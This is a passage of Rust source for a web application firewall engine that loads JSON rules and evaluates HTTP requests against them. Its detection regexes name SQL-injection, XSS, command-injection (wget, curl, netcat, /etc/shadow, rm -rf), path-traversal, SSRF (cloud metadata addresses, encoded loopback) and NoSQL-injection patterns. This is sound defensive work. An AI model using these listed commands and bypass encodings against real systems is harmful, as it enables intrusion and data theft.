use parking_lot::RwLock;
use std::collections::HashMap;
use std::sync::Arc;
use std::time::{Duration, Instant};
use base64::engine::general_purpose::STANDARD as BASE64_STANDARD;
use base64::Engine as _;
use once_cell::sync::Lazy;
use percent_encoding::percent_decode_str;
use regex::{Regex, RegexBuilder};
/// Default per-request evaluation time budget.
pub const DEFAULT_EVAL_TIMEOUT: Duration = Duration::from_millis(50);
/// Hard upper bound on any caller-supplied evaluation timeout.
pub const MAX_EVAL_TIMEOUT: Duration = Duration::from_millis(500);
/// Compiled-regex size limit (10 MiB) to bound pathological rule patterns.
const REGEX_SIZE_LIMIT: usize = 10 * (1 << 20);
/// Lazy-DFA size limit (10 MiB), same motivation as `REGEX_SIZE_LIMIT`.
const REGEX_DFA_SIZE_LIMIT: usize = 10 * (1 << 20);
/// Maximum nesting depth for match-condition recursion; deeper nesting
/// fails closed (condition evaluates to false).
const MAX_RECURSION_DEPTH: u32 = 10;
use crate::waf::index::{
build_rule_index, get_candidate_rule_indices, method_to_mask, CandidateCache,
CandidateCacheKey, RuleIndex, REQ_ARGS, REQ_ARG_ENTRIES, REQ_BODY, REQ_JSON,
};
use crate::waf::rule::{MatchCondition, MatchValue, WafRule};
use crate::waf::state::StateStore;
use crate::waf::types::{Action, EvalContext, Request, RiskContribution, Verdict};
use crate::waf::WafError;
use crate::waf::{TraceEvent, TraceSink, TraceState};
// ---- SQL-injection signature regexes (compiled lazily, once) ------------
// Shape of a base64 payload; not referenced in this chunk (kept for later use).
#[allow(dead_code)]
static BASE64_PATTERN: Lazy<Regex> =
Lazy::new(|| Regex::new(r"^([A-Za-z0-9+/]{4})*([A-Za-z0-9+/]{2,3}=)?$").expect("base64 regex"));
// Dangerous file-access primitives (MySQL LOAD_FILE / INTO OUTFILE).
static SQL_KEYWORDS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\b(load_file|into outfile)\b")
.case_insensitive(true)
.build()
.expect("sql keywords regex")
});
// Classic injected statement shapes (UNION SELECT, DROP TABLE, SELECT * FROM, ...).
static SQL_PHRASES: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(insert\s+into|delete\s+from|drop\s+(table|database|view)|union\s+(all\s+)?select|select\s+\*\s+from|select\s+.*\s+from\s+information_schema)\b",
)
.case_insensitive(true)
.build()
.expect("sql phrases regex")
});
// Numeric tautologies such as "or 1=1" / "and 2=2".
static SQL_OR_AND_EQ: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(\bor\b|\band\b)\s+\d+=\d+")
.case_insensitive(true)
.build()
.expect("sql or/and regex")
});
// Quote immediately followed by a SQL line comment: clause truncation.
static SQL_COMMENT_1: Lazy<Regex> = Lazy::new(|| Regex::new(r"'\s*--").expect("sql comment 1"));
static SQL_COMMENT_2: Lazy<Regex> = Lazy::new(|| Regex::new(r#""\s*--"#).expect("sql comment 2"));
// Piggybacked statement ending in SHUTDOWN.
static SQL_SHUTDOWN: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r";\s*shutdown\b")
.case_insensitive(true)
.build()
.expect("sql shutdown")
});
// ---- XSS signature regexes ----------------------------------------------
// Opening <script> tag, whitespace-tolerant.
static XSS_SCRIPT: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"<\s*script\b")
.case_insensitive(true)
.build()
.expect("xss script")
});
// javascript: URL scheme.
static XSS_JS_SCHEME: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"javascript:")
.case_insensitive(true)
.build()
.expect("xss js scheme")
});
// Inline event-handler attribute assignments (onload=, onerror=, ...).
static XSS_ON_ATTR: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(onload|onclick|onerror|onmouseover|onfocus|onblur|onsubmit|onchange|oninput|onkeydown|onkeyup|onkeypress|onmousedown|onmouseup|onmousemove|onmouseout|onresize|onscroll|onunload)\s*=",
)
.case_insensitive(true)
.build()
.expect("xss on attr")
});
// document.cookie access (typical of session-theft payloads).
static XSS_COOKIE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"document\.cookie")
.case_insensitive(true)
.build()
.expect("xss cookie")
});
// <img ... src vector (commonly paired with onerror handlers).
static XSS_IMG_SRC: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"<\s*img[^>]+src")
.case_insensitive(true)
.build()
.expect("xss img src")
});
// ---- Command-injection signature regexes --------------------------------
// Backtick command substitution.
static CMD_BACKTICK: Lazy<Regex> =
Lazy::new(|| Regex::new(r"`[^`]+`").expect("cmd backtick regex"));
// $( ... ) subshell substitution.
static CMD_SUBSHELL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\$\([^)]+\)").expect("cmd subshell regex"));
// ${ ... } variable substitution.
static CMD_VAR_SUBST: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\$\{[^}]+\}").expect("cmd var subst regex"));
// $IFS tricks used to evade whitespace filtering.
static CMD_IFS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\$IFS|\$\{IFS\}|\bIFS\s*=")
.case_insensitive(true)
.build()
.expect("cmd IFS regex")
});
// Shell command chaining/piping metacharacters (;, &, |, &&, ||).
static CMD_CHAIN: Lazy<Regex> = Lazy::new(|| Regex::new(r"[;&|]{1,2}").expect("cmd chain regex"));
// Brace expansion, e.g. {cat,/etc/passwd}.
static CMD_BRACE: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\{[^}]*,[^}]*\}").expect("cmd brace regex"));
// Known-dangerous binaries, interpreters, and sensitive paths.
static CMD_DANGEROUS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(cat\s+/etc/|/etc/passwd|/etc/shadow|wget\s|curl\s|nc\s+-|ncat\s|netcat\s|bash\s+-|sh\s+-c|/bin/sh|/bin/bash|chmod\s+\+|chown\s|rm\s+-rf|mkfifo|mknod|python\s+-c|perl\s+-e|ruby\s+-e|php\s+-r|lua\s+-e|awk\s+|xargs\s)"
)
.case_insensitive(true)
.build()
.expect("cmd dangerous regex")
});
// URL-encoded newlines (%0a / %0d) used to smuggle extra commands.
static CMD_NEWLINE_ENCODED: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%0[aAdD]")
.case_insensitive(true)
.build()
.expect("cmd newline encoded regex")
});
// Literal CR/LF characters.
static CMD_NEWLINE_LITERAL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"[\r\n]").expect("cmd newline literal regex"));
// Shell I/O redirections (<, >, 2>&1, &>).
static CMD_REDIRECT: Lazy<Regex> =
Lazy::new(|| Regex::new(r"[<>]{1,2}|2>&1|&>").expect("cmd redirect regex"));
// Dot-dot path traversal embedded in a command payload.
static CMD_PATH_TRAVERSAL: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\.{2,}/+").expect("cmd path traversal regex"));
// NUL-byte injection, encoded or escaped.
static CMD_NULL_BYTE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%00|\\x00|\\0")
.case_insensitive(true)
.build()
.expect("cmd null byte regex")
});
// ---- Path-traversal signature regexes -----------------------------------
// Literal dot-dot traversal: "..", followed by / or \ (or at end of input).
static PATH_TRAV_BASIC: Lazy<Regex> =
Lazy::new(|| Regex::new(r"\.{2,}[/\\]+|\.{2,}$").expect("path trav basic regex"));
// Single URL-encoded variants (%2e = '.', %2f = '/', %5c = '\').
static PATH_TRAV_ENCODED: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%2e%2e[%/\\]|\.\.%2f|\.\.%5c|%2e%2e$")
.case_insensitive(true)
.build()
.expect("path trav encoded regex")
});
// Double-URL-encoded traversal. ".." once-encoded is "%2e%2e"; encoding it
// again turns each '%' into "%25", giving "%252e%252e" followed by "%252f"
// (or "%255c"). The previous pattern ("%25" then two literal "2e"s) only
// matched the bogus string "%252e2e%25.." and could never fire on a real
// double-encoded payload such as "%252e%252e%252f".
static PATH_TRAV_DOUBLE: Lazy<Regex> = Lazy::new(|| {
    RegexBuilder::new(r"(?:%252e){2}%25(?:2f|5c)")
        .case_insensitive(true)
        .build()
        .expect("path trav double encoded regex")
});
// Overlong/invalid UTF-8 encodings of '.' and '/' (historic IIS-style
// bypass sequences; some entries like %c0%9v are deliberately malformed
// encodings seen in real exploit traffic).
static PATH_TRAV_UNICODE: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%c0%ae|%c0%af|%c1%9c|%c0%9v|%c1%1c|%c0%2e|%e0%80%ae|%f0%80%80%ae")
.case_insensitive(true)
.build()
.expect("path trav unicode regex")
});
// Windows backslash traversal, literal or encoded.
static PATH_TRAV_BACKSLASH: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\.\.\\|%5c%2e%2e|%2e%2e%5c")
.case_insensitive(true)
.build()
.expect("path trav backslash regex")
});
// Sensitive Unix file/directory targets.
static PATH_TRAV_TARGETS_UNIX: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"/etc/(passwd|shadow|group|hosts|sudoers|ssh/|crontab)|/proc/|/dev/|/var/log/|/root/|\.ssh/|\.bash_history|\.env")
.expect("path trav targets unix regex")
});
// Sensitive Windows file targets.
static PATH_TRAV_TARGETS_WIN: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"boot\.ini|win\.ini|system32|windows\\system|SAM|NTDS\.dit|web\.config|machine\.config",
)
.case_insensitive(true)
.build()
.expect("path trav targets win regex")
});
// NUL-byte truncation, encoded (%00), escaped (\x00, \0), or literal.
static PATH_TRAV_NULL: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"%00|\\x00|\\0|\x00")
.case_insensitive(true)
.build()
.expect("path trav null regex")
});
// ---- SSRF signature regexes ---------------------------------------------
// All host patterns anchor on "//" (scheme-relative) or "@" (userinfo trick).
// IPv4 loopback (entire 127.0.0.0/8).
static SSRF_LOCALHOST_V4: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)127\.(?:\d{1,3}\.){2}\d{1,3}(?:[:/]|$)")
.expect("ssrf localhost v4 regex")
});
// IPv6 loopback, bracketed or bare.
static SSRF_LOCALHOST_V6: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)\[?(?:::1|0:0:0:0:0:0:0:1)\]?(?:[:/]|$)")
.expect("ssrf localhost v6 regex")
});
// IPv4-mapped IPv6 (::ffff:a.b.c.d) used to dodge IPv4 blocklists.
static SSRF_MAPPED_IPV6: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)\[?::ffff:(?:\d{1,3}\.){3}\d{1,3}\]?(?:[:/]|$)")
.expect("ssrf mapped ipv6 regex")
});
// Cloud metadata IPs: 169.254.169.254 (AWS/GCP/Azure) and 169.254.170.2 (ECS).
static SSRF_CLOUD_METADATA: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)169\.254\.(?:169\.254|170\.2)(?:[:/]|$)")
.expect("ssrf cloud metadata regex")
});
// Cloud metadata hostnames.
static SSRF_METADATA_HOST: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(?://|@)(?:metadata\.google\.internal|metadata\.azure\.com|instance-data\.ec2\.internal|169\.254\.169\.254)")
.case_insensitive(true)
.build()
.expect("ssrf metadata host regex")
});
// RFC 1918 private ranges (10/8, 192.168/16, 172.16/12).
static SSRF_PRIVATE_IP: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)(?:10\.(?:\d{1,3}\.){2}\d{1,3}|192\.168\.(?:\d{1,3}\.)\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.(?:\d{1,3}\.)\d{1,3})(?:[:/]|$)")
.expect("ssrf private ip regex")
});
// Link-local range (169.254/16) beyond the metadata addresses above.
static SSRF_LINK_LOCAL: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)169\.254\.(?:\d{1,3}\.)\d{1,3}(?:[:/]|$)")
.expect("ssrf link local regex")
});
// Non-HTTP schemes commonly abused for SSRF pivoting (file, gopher, data:, ...).
static SSRF_DANGEROUS_SCHEME: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"(?:^|[^a-z0-9])(?:(?:file|gopher|dict|ldap|ldaps|expect|php|phar|jar|ftp|tftp|ssh2)://|data:)")
.case_insensitive(true)
.build()
.expect("ssrf dangerous scheme regex")
});
// Obfuscated IP encodings: hex (0x7f000001), decimal (2130706433),
// zero-padded octal, or any long all-digit host.
static SSRF_ENCODED_IP: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?://|@)(?:0x[0-9a-f]{8}|2130706433|017700000001|\d{8,10})(?:[:/]|$)")
.expect("ssrf encoded ip regex")
});
// ---- NoSQL-injection signature regexes ----------------------------------
// MongoDB query/projection operators appearing as JSON keys.
static NOSQL_MONGO_OPERATORS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$(?:where|ne|gt|lt|gte|lte|in|nin|regex|exists|type|mod|all|size|elemMatch|meta|slice|comment|rand|natural|or|and|not|nor|expr|jsonSchema|text|geoWithin|geoIntersects|near|nearSphere)["\']?\s*:"#)
.expect("nosql mongo operators regex")
});
// $where carrying server-side JavaScript.
static NOSQL_WHERE_JS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$where["\']?\s*:\s*["\']?(?:function\s*\(|this\.|sleep\(|db\.|new\s+Date|tojson|printjson)"#)
.expect("nosql where js regex")
});
// Auth-bypass shapes such as password: {"$ne": ...}.
static NOSQL_AUTH_BYPASS: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)(?:password|passwd|pwd|user|username|login|email)["\']?\s*:\s*\{\s*["\']?\$(?:ne|gt|lt|gte|lte|exists)["\']?\s*:"#)
.expect("nosql auth bypass regex")
});
// MongoDB aggregation-pipeline stages.
static NOSQL_AGGREGATION: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?\$(?:lookup|unwind|group|project|match|sort|limit|skip|out|merge|addFields|replaceRoot)["\']?\s*:"#)
.expect("nosql aggregation regex")
});
// CouchDB internal endpoints.
static NOSQL_COUCHDB: Lazy<Regex> = Lazy::new(|| {
Regex::new(r"(?i)(?:_all_docs|_design/|_view/|_changes|_bulk_docs|_find)")
.expect("nosql couchdb regex")
});
// Dangerous Redis commands (script eval, config, replication, flush).
static NOSQL_REDIS: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(r"\b(?:EVAL|EVALSHA|SCRIPT|DEBUG|FLUSHALL|FLUSHDB|CONFIG|SHUTDOWN|SLAVEOF|REPLICAOF|MIGRATE|DUMP|RESTORE|KEYS|SCAN)\b")
.case_insensitive(true)
.build()
.expect("nosql redis regex")
});
// Cassandra CQL constructs rarely seen in benign input.
static NOSQL_CASSANDRA: Lazy<Regex> = Lazy::new(|| {
RegexBuilder::new(
r"\b(?:ALLOW\s+FILTERING|USING\s+TTL|USING\s+TIMESTAMP|TOKEN\s*\(|WRITETIME\s*\()\b",
)
.case_insensitive(true)
.build()
.expect("nosql cassandra regex")
});
// JavaScript prototype-pollution keys in JSON bodies.
static JSON_PROTO_POLLUTION: Lazy<Regex> = Lazy::new(|| {
Regex::new(r#"(?i)["\']?(?:__proto__|constructor|prototype)["\']?\s*:"#)
.expect("json proto pollution regex")
});
/// Fully compiled rule set: rules plus every derived lookup structure.
/// Built off the hot path (see `Engine::precompute_rules`) so it can be
/// swapped into an `Engine` without any fallible work.
pub struct CompiledRules {
/// Parsed rules, in document order.
pub rules: Vec<WafRule>,
/// Rule id -> index into `rules`.
pub rule_id_to_index: HashMap<u32, usize>,
/// Feature index used for candidate pre-filtering.
pub rule_index: RuleIndex,
/// Pattern string -> compiled regex for "regex" conditions.
pub regex_cache: HashMap<String, Regex>,
/// Word -> compiled case-insensitive whole-word regex for "word" conditions.
pub word_regex_cache: HashMap<String, Regex>,
}
/// Rule-evaluation engine. Rule data and regex caches are owned directly
/// (mutated only through `&mut self` reloads); runtime knobs, the tracking
/// store, and the candidate cache sit behind locks so they can be used and
/// tuned through `&self` during evaluation.
pub struct Engine {
rules: Vec<WafRule>,
rule_id_to_index: HashMap<u32, usize>,
rule_index: RuleIndex,
regex_cache: HashMap<String, Regex>,
word_regex_cache: HashMap<String, Regex>,
// Per-IP event/unique-value tracking for count-based conditions.
store: RwLock<StateStore>,
// Memoizes candidate-rule lists per (method, features, uri, ...) key.
candidate_cache: RwLock<CandidateCache>,
// Cap applied to the accumulated risk score.
max_risk: RwLock<f64>,
// Flag is stored but not yet consumed in `evaluate_with_trace` -- see note there.
enable_repeat_multipliers: RwLock<bool>,
}
impl Engine {
/// Creates an engine with no rules loaded, default limits (max risk 100,
/// repeat multipliers on) and a 2048-entry candidate cache.
pub fn empty() -> Self {
Self {
rules: Vec::new(),
rule_id_to_index: HashMap::new(),
rule_index: RuleIndex::default(),
regex_cache: HashMap::new(),
word_regex_cache: HashMap::new(),
store: RwLock::new(StateStore::default()),
candidate_cache: RwLock::new(CandidateCache::new(2048)),
max_risk: RwLock::new(100.0),
enable_repeat_multipliers: RwLock::new(true),
}
}
/// Sets the cap applied to the accumulated risk score (runtime-tunable).
pub fn set_max_risk(&self, max_risk: f64) {
*self.max_risk.write() = max_risk;
}
/// Returns the current risk-score cap.
pub fn max_risk(&self) -> f64 {
*self.max_risk.read()
}
/// Enables or disables repeat-offender risk multipliers.
/// NOTE(review): the flag is read in `evaluate_with_trace` but not applied
/// anywhere visible -- confirm it is consumed elsewhere.
pub fn set_repeat_multipliers(&self, enabled: bool) {
*self.enable_repeat_multipliers.write() = enabled;
}
/// Parses and compiles a JSON rule document, then swaps it in atomically.
/// Returns the number of rules loaded.
///
/// # Errors
/// `WafError::ParseError` on malformed JSON or `WafError::RegexError` on a
/// bad pattern; in both cases the currently loaded rules remain active.
pub fn load_rules(&mut self, json: &[u8]) -> Result<usize, WafError> {
let compiled = self.precompute_rules(json)?;
let count = compiled.rules.len();
self.reload_from_compiled(compiled);
Ok(count)
}
/// Parses a JSON rule document and builds every derived structure
/// (id index, feature index, regex and word caches) without touching
/// `self`, so the result can later be installed atomically via
/// `reload_from_compiled`.
///
/// # Errors
/// `WafError::ParseError` for malformed JSON; `WafError::RegexError` when
/// any referenced pattern or word fails to compile under the size limits.
pub fn precompute_rules(&self, json: &[u8]) -> Result<CompiledRules, WafError> {
let rules: Vec<WafRule> =
serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))?;
let rule_id_to_index = rules
.iter()
.enumerate()
.map(|(idx, rule)| (rule.id, idx))
.collect();
let rule_index = build_rule_index(&rules);
let mut regex_cache = HashMap::new();
let mut word_regex_cache = HashMap::new();
// Collect every regex pattern and bare word referenced by any condition
// (recursively), then dedupe so each is compiled exactly once.
let mut patterns = Vec::<String>::new();
let mut words = Vec::<String>::new();
for rule in &rules {
for cond in &rule.matches {
collect_regex_patterns(cond, &mut patterns);
collect_word_values(cond, &mut words);
}
}
patterns.sort();
patterns.dedup();
for pattern in patterns {
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
regex_cache.insert(pattern, compiled);
}
words.sort();
words.dedup();
for word in words {
// Word matches are case-insensitive whole-word regexes.
let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
word_regex_cache.insert(word, compiled);
}
Ok(CompiledRules {
rules,
rule_id_to_index,
rule_index,
regex_cache,
word_regex_cache,
})
}
/// Installs a precompiled rule set and invalidates the candidate cache.
/// Infallible by design: all fallible work happens in `precompute_rules`.
pub fn reload_from_compiled(&mut self, compiled: CompiledRules) {
self.rules = compiled.rules;
self.rule_id_to_index = compiled.rule_id_to_index;
self.rule_index = compiled.rule_index;
self.regex_cache = compiled.regex_cache;
self.word_regex_cache = compiled.word_regex_cache;
// Cached candidate lists reference old rule indices; drop them all.
self.candidate_cache.write().clear();
}
/// Parses a JSON rule document without compiling or installing it.
///
/// # Errors
/// `WafError::ParseError` on malformed JSON.
pub fn parse_rules(json: &[u8]) -> Result<Vec<WafRule>, WafError> {
serde_json::from_slice(json).map_err(|e| WafError::ParseError(e.to_string()))
}
pub fn reload_rules(&mut self, rules: Vec<WafRule>) -> Result<(), WafError> {
self.rules = rules;
self.rule_id_to_index = self
.rules
.iter()
.enumerate()
.map(|(idx, rule)| (rule.id, idx))
.collect();
self.rule_index = build_rule_index(&self.rules);
self.candidate_cache.write().clear();
self.regex_cache.clear();
self.word_regex_cache.clear();
let mut patterns = Vec::<String>::new();
let mut words = Vec::<String>::new();
for rule in &self.rules {
for cond in &rule.matches {
collect_regex_patterns(cond, &mut patterns);
collect_word_values(cond, &mut words);
}
}
patterns.sort();
patterns.dedup();
for pattern in patterns {
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("'{pattern}': {e}")))?;
self.regex_cache.insert(pattern, compiled);
}
words.sort();
words.dedup();
for word in words {
let pattern = format!(r"(?i)\b{}\b", regex::escape(&word));
let compiled = RegexBuilder::new(&pattern)
.multi_line(true)
.size_limit(REGEX_SIZE_LIMIT)
.dfa_size_limit(REGEX_DFA_SIZE_LIMIT)
.build()
.map_err(|e| WafError::RegexError(format!("word '{word}': {e}")))?;
self.word_regex_cache.insert(word, compiled);
}
Ok(())
}
/// Number of currently loaded rules.
pub fn rule_count(&self) -> usize {
self.rules.len()
}
/// Evaluates a request with tracing disabled and no deadline.
pub fn analyze(&self, req: &Request) -> Verdict {
let ctx = EvalContext::from_request(req);
let mut trace_state = TraceState::disabled();
self.evaluate_with_trace(&ctx, &mut trace_state)
}
/// Evaluates a request while emitting trace events to `trace`, finishing
/// with an `EvaluationFinished` summary that includes wall-clock duration.
pub fn analyze_with_trace(&self, req: &Request, trace: &mut dyn TraceSink) -> Verdict {
let ctx = EvalContext::from_request(req);
let mut trace_state = TraceState::enabled(trace);
let start = Instant::now();
let verdict = self.evaluate_with_trace(&ctx, &mut trace_state);
let detection_time_us = start.elapsed().as_micros() as u64;
if trace_state.is_enabled() {
trace_state.emit(TraceEvent::EvaluationFinished {
verdict: if matches!(verdict.action, Action::Block) {
"block".to_string()
} else {
"allow".to_string()
},
risk_score: verdict.risk_score,
matched_rules: verdict.matched_rules.clone(),
timed_out: verdict.timed_out,
rules_evaluated: verdict.rules_evaluated,
detection_time_us,
});
}
verdict
}
/// Evaluates a request under a deadline. The caller's `timeout` is clamped
/// to `MAX_EVAL_TIMEOUT`; on expiry a partial verdict is returned with
/// `timed_out` set (see `evaluate_with_trace`).
pub fn analyze_with_timeout(&self, req: &Request, timeout: Duration) -> Verdict {
let effective_timeout = timeout.min(MAX_EVAL_TIMEOUT);
let deadline = Instant::now() + effective_timeout;
let ctx = EvalContext::from_request_with_deadline(req, deadline);
let mut trace_state = TraceState::disabled();
self.evaluate_with_trace(&ctx, &mut trace_state)
}
/// Convenience wrapper: evaluate with the default 50 ms budget.
pub fn analyze_safe(&self, req: &Request) -> Verdict {
self.analyze_with_timeout(req, DEFAULT_EVAL_TIMEOUT)
}
/// Core evaluation loop shared by every `analyze*` entry point.
///
/// Pre-filters the rule set to candidates that can possibly apply to this
/// request (memoized in the candidate cache), evaluates each until done or
/// the context deadline expires, and folds matches into a `Verdict`.
fn evaluate_with_trace(&self, ctx: &EvalContext, trace: &mut TraceState) -> Verdict {
let mut matched_rules = Vec::new();
let mut total_risk = 0.0;
let mut should_block = false;
let mut timed_out = false;
let mut rules_evaluated: u32 = 0;
// Always empty here; reserved for per-rule risk breakdowns.
let risk_contributions: Vec<RiskContribution> = Vec::new();
let max_risk = *self.max_risk.read();
// NOTE(review): read but never applied below -- confirm whether the
// repeat-multiplier logic is implemented elsewhere or still pending.
let _enable_multipliers = *self.enable_repeat_multipliers.read();
let method_bit = method_to_mask(ctx.method).unwrap_or(0);
let uri = ctx.url;
let available_features = compute_available_features(ctx);
let header_mask = compute_request_header_mask(&self.rule_index, &ctx.headers);
let cache_key = CandidateCacheKey {
method_bit,
available_features,
is_static: ctx.is_static,
header_mask,
};
// A write lock is taken even for the lookup -- presumably `get` mutates
// internal bookkeeping (e.g. recency); confirm against CandidateCache.
let cached = self.candidate_cache.write().get(&cache_key, uri);
let candidates: Arc<[usize]> = match cached {
Some(v) => v,
None => {
let computed = get_candidate_rule_indices(
&self.rule_index,
method_bit,
uri,
available_features,
ctx.is_static,
header_mask,
self.rules.len(),
safe_percent_decode,
);
// Arc<[usize]> makes cache hits a cheap refcount clone.
let candidates: Arc<[usize]> = Arc::from(computed);
self.candidate_cache
.write()
.insert(cache_key, uri.to_string(), candidates.clone());
candidates
}
};
if trace.is_enabled() {
trace.emit(TraceEvent::EvaluationStarted {
method: ctx.method.to_string(),
uri: ctx.url.to_string(),
candidate_rules: candidates.len(),
});
}
for &rule_idx in candidates.iter() {
// Checked once per rule: on expiry we return a partial verdict
// instead of erroring out.
if ctx.is_deadline_exceeded() {
timed_out = true;
break;
}
let rule = &self.rules[rule_idx];
rules_evaluated += 1;
if trace.is_enabled() {
trace.emit(TraceEvent::RuleStart { rule_id: rule.id });
}
let matched = self.eval_rule(rule, ctx, trace);
if trace.is_enabled() {
trace.emit(TraceEvent::RuleEnd {
rule_id: rule.id,
matched,
risk: rule.effective_risk(),
blocking: rule.blocking.unwrap_or(false),
});
}
if matched {
matched_rules.push(rule.id);
total_risk += rule.effective_risk();
if rule.blocking.unwrap_or(false) {
should_block = true;
}
}
}
// Clamp to [0, max_risk]; the f64 -> u16 `as` cast saturates.
let risk_score = total_risk.min(max_risk).max(0.0) as u16;
Verdict {
action: if should_block {
Action::Block
} else {
Action::Allow
},
risk_score,
matched_rules,
entity_risk: 0.0,
entity_blocked: false,
block_reason: if should_block {
Some("Rule-based block".to_string())
} else if timed_out {
Some("Evaluation timeout (partial result)".to_string())
} else {
None
},
risk_contributions,
endpoint_template: None,
endpoint_risk: None,
anomaly_score: None,
adjusted_threshold: None,
anomaly_signals: Vec::new(),
timed_out,
// Only reported for partial (timed-out) evaluations.
rules_evaluated: if timed_out {
Some(rules_evaluated)
} else {
None
},
}
}
/// A rule matches only if every one of its top-level conditions matches
/// (evaluation short-circuits on the first failure).
fn eval_rule(&self, rule: &WafRule, ctx: &EvalContext, trace: &mut TraceState) -> bool {
    rule.matches
        .iter()
        .all(|cond| self.eval_condition(cond, ctx, None, trace, rule.id, 0))
}
/// Recursive condition dispatcher.
///
/// `value` is the string the condition operates on (None at the top level;
/// set by parent conditions such as "uri", "args", or the decoders).
/// Recursion deeper than `MAX_RECURSION_DEPTH` fails closed, as do unknown
/// condition kinds.
fn eval_condition(
&self,
condition: &MatchCondition,
ctx: &EvalContext,
value: Option<&str>,
trace: &mut TraceState,
rule_id: u32,
depth: u32,
) -> bool {
if depth >= MAX_RECURSION_DEPTH {
return false;
}
let matched = match condition.kind.as_str() {
"boolean" => self.eval_boolean(condition, ctx, value, trace, rule_id, depth),
"method" => self.eval_method(condition, ctx, trace, rule_id, depth),
"uri" => self.eval_uri(condition, ctx, trace, rule_id, depth),
"args" => self.eval_args(condition, ctx, trace, rule_id, depth),
"named_argument" => self.eval_named_argument(condition, ctx, trace, rule_id, depth),
"header" => self.eval_header(condition, ctx, trace, rule_id, depth),
"contains" => eval_contains(condition.match_value.as_ref(), value),
"starts_with" => eval_starts_with(condition.match_value.as_ref(), value),
"equals" => eval_equals(condition.match_value.as_ref(), value),
"regex" => self.eval_regex(condition.match_value.as_ref(), value),
"word" => self.eval_word(condition.match_value.as_ref(), value),
"multiple_contains" => eval_multiple_contains(condition.match_value.as_ref(), value),
// NOTE(review): "to_lowercase" and "request_json" treat a missing
// child condition as a match (`unwrap_or(true)`), while
// "percent_decode" / "decode_if_base64" fail closed
// (`unwrap_or(false)`) -- confirm the asymmetry is intended.
"to_lowercase" => match value {
Some(v) => {
let lowered = v.to_lowercase();
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&lowered),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(true)
}
None => false,
},
"percent_decode" => match value {
Some(v) => {
let decoded = safe_percent_decode(v);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&decoded),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(false)
}
None => false,
},
"decode_if_base64" => match value {
Some(v) => {
let decoded = decode_if_base64(v);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(
child,
ctx,
Some(&decoded),
trace,
rule_id,
depth + 1,
)
})
.unwrap_or(false)
}
None => false,
},
// Re-serializes the request and feeds it to the child condition.
"request" => {
let raw = build_raw_request(ctx);
condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(child, ctx, Some(&raw), trace, rule_id, depth + 1)
})
.unwrap_or(false)
}
"request_json" => match ctx.json_text.as_deref() {
Some(json_text) => condition
.match_value
.as_ref()
.and_then(|m| m.as_cond())
.map(|child| {
self.eval_condition(child, ctx, Some(json_text), trace, rule_id, depth + 1)
})
.unwrap_or(true),
None => false,
},
// Matches when the request's static-content flag equals the target.
"static_content" => condition
.match_value
.as_ref()
.and_then(|m| m.as_bool())
.map(|target| ctx.is_static == target)
